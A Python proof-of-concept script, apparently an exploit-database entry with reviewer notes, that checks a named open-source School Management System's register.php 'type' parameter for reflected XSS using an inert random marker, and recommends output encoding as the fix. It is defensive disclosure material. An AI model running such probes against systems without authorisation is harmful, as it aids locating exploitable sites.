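#!/usr/bin/env python3
# Exploit Title: School Management System 1.0 - Reflected XSS
# Date: 2026-04-16
# Exploit Author: Varad AP Mene (menevarad007@gmail.com)
# Vendor Homepage: https://github.com/mahmoudai1/school-management-system
# Software Link: https://github.com/mahmoudai1/school-management-system
# Version: 1.0
# Tested on: Windows 10 / XAMPP, Kali Linux
# CVE: CVE-2026-37750
#
# Reviewer notes:
# - This is a reflection check for the `type` query parameter of register.php.
#   It reports whether HTML metacharacters sent in that parameter come back in
#   the response body without being encoded.
# - The listing as published carried an empty payload string. `"" in r.text`
#   is true for every response, so every reachable host was reported as
#   vulnerable. The check below uses a random, inert marker instead.
# - Application-side fix (to be confirmed against register.php, which is not
#   shown here): HTML-encode the parameter at the point where it is written
#   into the page, e.g. with PHP's htmlspecialchars(), or map it onto a fixed
#   allow-list of expected values. A Content-Security-Policy is a useful
#   second layer but does not replace output encoding.

import argparse
import secrets
import sys

import requests


def _build_probe():
    """Return a unique, inert marker wrapped in angle brackets.

    The marker is not an HTML element any browser knows and carries no script,
    so it does nothing when rendered. The random suffix keeps it from matching
    text that is already on the page. If the application HTML-encodes its
    output, the angle brackets come back as entities and the raw marker is
    absent from the response.
    """
    return f"<xssprobe-{secrets.token_hex(8)}>"


def verify_xss(base_url):
    """Check whether register.php reflects the `type` parameter unencoded.

    Args:
        base_url: Base URL of the installation, without a trailing slash.

    Returns:
        True if the raw marker appears in the response body, else False.

    Raises:
        requests.RequestException: on connection errors or timeouts.

    A True result shows that angle brackets are reflected without encoding.
    It does not by itself show which HTML context the value lands in, so the
    result should be confirmed by reading the response around the marker.
    """
    url = f"{base_url}/register.php"
    payload = _build_probe()
    params = {'type': payload}

    print(f"[*] Target : {url}")
    print(f"[*] Payload : {payload}")

    # The context manager closes the pooled connections when the check ends.
    with requests.Session() as session:
        session.headers.update({'User-Agent': 'Mozilla/5.0'})
        r = session.get(url, params=params, timeout=10)

    # Guard against a vacuous match: an empty needle is contained in any text.
    if payload and payload in r.text:
        print("[+] VULNERABLE! XSS reflected unescaped!")
        print(f"[+] PoC URL: {r.url}")
        return True

    print("[-] Not vulnerable.")
    return False


def main():
    """Parse --url, run the reflection check and exit 0 (reflected) or 1."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--url', required=True, help='Target URL')
    args = parser.parse_args()

    print("=" * 60)
    print("CVE-2026-37750 — Reflected XSS")
    print("Product: School Management System 1.0")
    print("Author : Varad AP Mene")
    print("=" * 60)

    try:
        result = verify_xss(args.url.rstrip('/'))
    except Exception as e:
        # Top-level boundary: report network or parsing failures as a
        # non-zero exit instead of a traceback.
        print(f"[-] Error: {e}")
        sys.exit(1)

    # Kept outside the try block so SystemExit is never routed through the
    # error handler above.
    sys.exit(0 if result else 1)


if __name__ == '__main__':
    main()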